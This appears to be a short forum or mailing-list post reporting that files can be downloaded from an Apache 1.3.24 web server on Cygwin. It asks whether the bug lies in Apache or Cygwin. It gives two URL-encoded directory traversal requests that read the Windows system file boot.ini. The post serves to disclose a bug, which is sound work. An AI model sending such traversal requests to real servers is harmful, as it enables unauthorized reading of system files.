I've experienced below security problems on cygwin environment. you can download any files on web server. http://[server]/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini http://[server]/..%5C..%5C..%5C..%5C..%5C..%5C/boot.ini
is this a Apache 1.3.24 bug or a cygwin bug?
